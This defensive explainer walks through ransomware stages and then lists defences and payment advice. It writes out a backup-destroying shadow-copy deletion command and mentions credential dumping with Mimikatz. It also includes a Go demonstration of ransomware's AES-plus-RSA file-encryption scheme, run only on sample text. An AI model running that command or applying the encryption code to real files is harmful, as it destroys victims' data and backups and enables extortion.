Ransomware Is Not What It Used to Be

Early ransomware was relatively blunt: a piece of malware would encrypt your files and demand a small payment. Today's ransomware operations are professional criminal enterprises with customer service portals, negotiation teams, and affiliate networks. Understanding how they work is the first step in defending against them.

Stage 1: Initial Access

Attackers need a foothold before anything else. The most common entry points are:

  • Phishing emails: Malicious attachments or links that deliver a dropper or exploit.
  • Exposed RDP (Remote Desktop Protocol): Brute-forced or credential-stuffed accounts on internet-facing remote desktops.
  • Unpatched software vulnerabilities: Known CVEs in VPNs, firewalls, or web-facing applications exploited before patches are applied.
  • Compromised credentials: Bought from dark web marketplaces or initial access brokers, typically harvested by infostealer malware or exposed in earlier data breaches.

Stage 2: Reconnaissance and Lateral Movement

Once inside, attackers don't rush. They often spend days or weeks quietly:

  • Mapping the network to identify high-value targets (domain controllers, backup servers, finance systems).
  • Harvesting credentials, for example by dumping LSASS memory with tools like Mimikatz, and reusing them to escalate to local and eventually domain administrator.
  • Moving laterally with the same remote-administration tooling a sysadmin would use (PsExec, WMI, PowerShell remoting, RDP). Because the activity looks like routine administration, this "living off the land" approach is hard to distinguish from legitimate use.
  • Locating backups and disabling or destroying them to maximize leverage: deleting Volume Shadow Copies (vssadmin delete shadows /all /quiet), wiping backup catalogs, and turning off Windows recovery options.

Stage 3: Data Exfiltration (Double Extortion)

Modern ransomware groups don't just encrypt your files — they steal them first. This "double extortion" tactic means victims face two threats:

  1. Encrypted systems they can't access without a decryption key.
  2. Stolen data being publicly leaked or sold if the ransom isn't paid.

Some groups have evolved to triple extortion, adding a third pressure point such as DDoS attacks against the victim or direct contact with the victim's customers, partners, or regulators about the breach.

Stage 4: Encryption and Ransom Demand

The ransomware payload itself is often the last thing deployed, and the most visible. It uses hybrid encryption rather than purely asymmetric encryption: each file is encrypted with a fast symmetric cipher (typically AES, sometimes ChaCha20) under a freshly generated key, and that key is in turn encrypted with the attacker's RSA public key, which is embedded in the payload. The matching private key never touches the victim's network, so recovering the file keys, and therefore the files, without it is computationally infeasible. Many families encrypt only part of each large file so the job finishes before defenders can react. A ransom note is dropped, directing victims to a Tor-based negotiation portal.
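To make that key hierarchy concrete, here is an added example in Go; it is not code from this page and not any real family's implementation. A fresh AES-256-GCM key is generated per file, the file is encrypted with it, and the key is then wrapped with RSA-OAEP under the attacker's public key. The round trip is attempted with the attacker's private key and with an unrelated one. Field names, the helper names, and the sample plaintext are this example's own.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"io"
)

// EncryptedFile is what replaces each original file on disk (names are this example's).
type EncryptedFile struct {
	WrappedKey []byte // RSA-OAEP(attacker public key, fileKey)
	Nonce      []byte // AES-GCM nonce, unique per file
	Ciphertext []byte // AES-GCM(fileKey, plaintext)
}

// gcmFor builds an AES-256-GCM AEAD for key.
func gcmFor(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// EncryptFile implements the hybrid scheme: a fresh 256-bit key for this file,
// AES-GCM for the data, RSA-OAEP to wrap the key. Only the public key is needed,
// so the payload can run on the victim without ever holding the private key.
func EncryptFile(pub *rsa.PublicKey, plaintext []byte) (*EncryptedFile, error) {
	fileKey := make([]byte, 32)
	if _, err := io.ReadFull(rand.Reader, fileKey); err != nil {
		return nil, err
	}
	aead, err := gcmFor(fileKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	ciphertext := aead.Seal(nil, nonce, plaintext, nil)
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, fileKey, nil)
	if err != nil {
		return nil, err
	}
	// The plaintext key is discarded; from here on it exists only inside wrapped.
	for i := range fileKey {
		fileKey[i] = 0
	}
	return &EncryptedFile{WrappedKey: wrapped, Nonce: nonce, Ciphertext: ciphertext}, nil
}

// DecryptFile is what the decryptor sold to a paying victim does: unwrap the file
// key with the private key, then AES-GCM decrypt. Without priv, RSA-OAEP refuses.
func DecryptFile(priv *rsa.PrivateKey, ef *EncryptedFile) ([]byte, error) {
	fileKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, ef.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	aead, err := gcmFor(fileKey)
	if err != nil {
		return nil, err
	}
	return aead.Open(nil, ef.Nonce, ef.Ciphertext, nil)
}

// RoundTrip reports whether the attacker's key recovers plaintext and whether an unrelated key does.
func RoundTrip(plaintext []byte) (rightKeyWorks, wrongKeyWorks bool, err error) {
	attacker, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return false, false, err
	}
	ef, err := EncryptFile(&attacker.PublicKey, plaintext)
	if err != nil {
		return false, false, err
	}
	got, err := DecryptFile(attacker, ef)
	rightKeyWorks = err == nil && bytes.Equal(got, plaintext)
	// A second key pair stands in for anyone who lacks the attacker's private key.
	stranger, _ := rsa.GenerateKey(rand.Reader, 2048)
	_, err = DecryptFile(stranger, ef)
	wrongKeyWorks = err == nil
	return rightKeyWorks, wrongKeyWorks, nil
}

func main() {
	// Constructed sample content standing in for a victim's document.
	ok, wrong, err := RoundTrip([]byte("Q3 forecast: constructed sample data"))
	fmt.Printf("attacker key decrypts: %v, unrelated key decrypts: %v, err: %v\n", ok, wrong, err)
}
```

Note what the victim's disk holds afterwards: ciphertext, a nonce, and a wrapped key, none of which yields the file key without the private key. The zeroing step is where real payloads sometimes get it wrong; several families have been broken, and free decryptors published, because a file key or master key was left recoverable from memory or reused across files.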

Ransomware-as-a-Service (RaaS)

Many major ransomware attacks today are carried out by affiliates who license the ransomware from developers and share a percentage of proceeds. This model has dramatically lowered the skill barrier for attackers and increased the volume of incidents globally.

How to Defend Against Ransomware

  • Immutable, offsite backups: The most effective recovery tool. Keep at least one copy that cannot be modified or deleted with credentials from your production domain, and test restores regularly.
  • Patch management: Prioritize internet-facing systems such as VPN appliances, firewalls, and web applications. Most ransomware intrusions exploit vulnerabilities for which a patch already exists.
  • MFA everywhere: Especially on RDP, VPNs, and email. Prefer phishing-resistant methods (FIDO2 security keys) where you can; push-based MFA can be worn down by prompt bombing.
  • Network segmentation: Limit how far an attacker can move laterally if they do get in, and keep backup and management networks separate from user workstations.
  • Endpoint Detection and Response (EDR): Modern EDR solutions watch for precursor behavior such as shadow-copy deletion, credential dumping, and bursts of file renames, and can stop the payload before encryption completes.
  • User awareness training: Phishing remains one of the most common entry points, so train employees to recognize and report it.

Should You Pay the Ransom?

Law enforcement generally advises against paying: it funds criminal operations, does not guarantee data recovery (decryptors are often slow or buggy, and stolen data may be leaked anyway), and marks you as a willing payer for future attacks. In some jurisdictions a payment to a sanctioned group can itself be unlawful, as the US Treasury's OFAC has warned. Consult legal counsel and your country's relevant authorities (FBI, CISA, NCSC) before making any decision.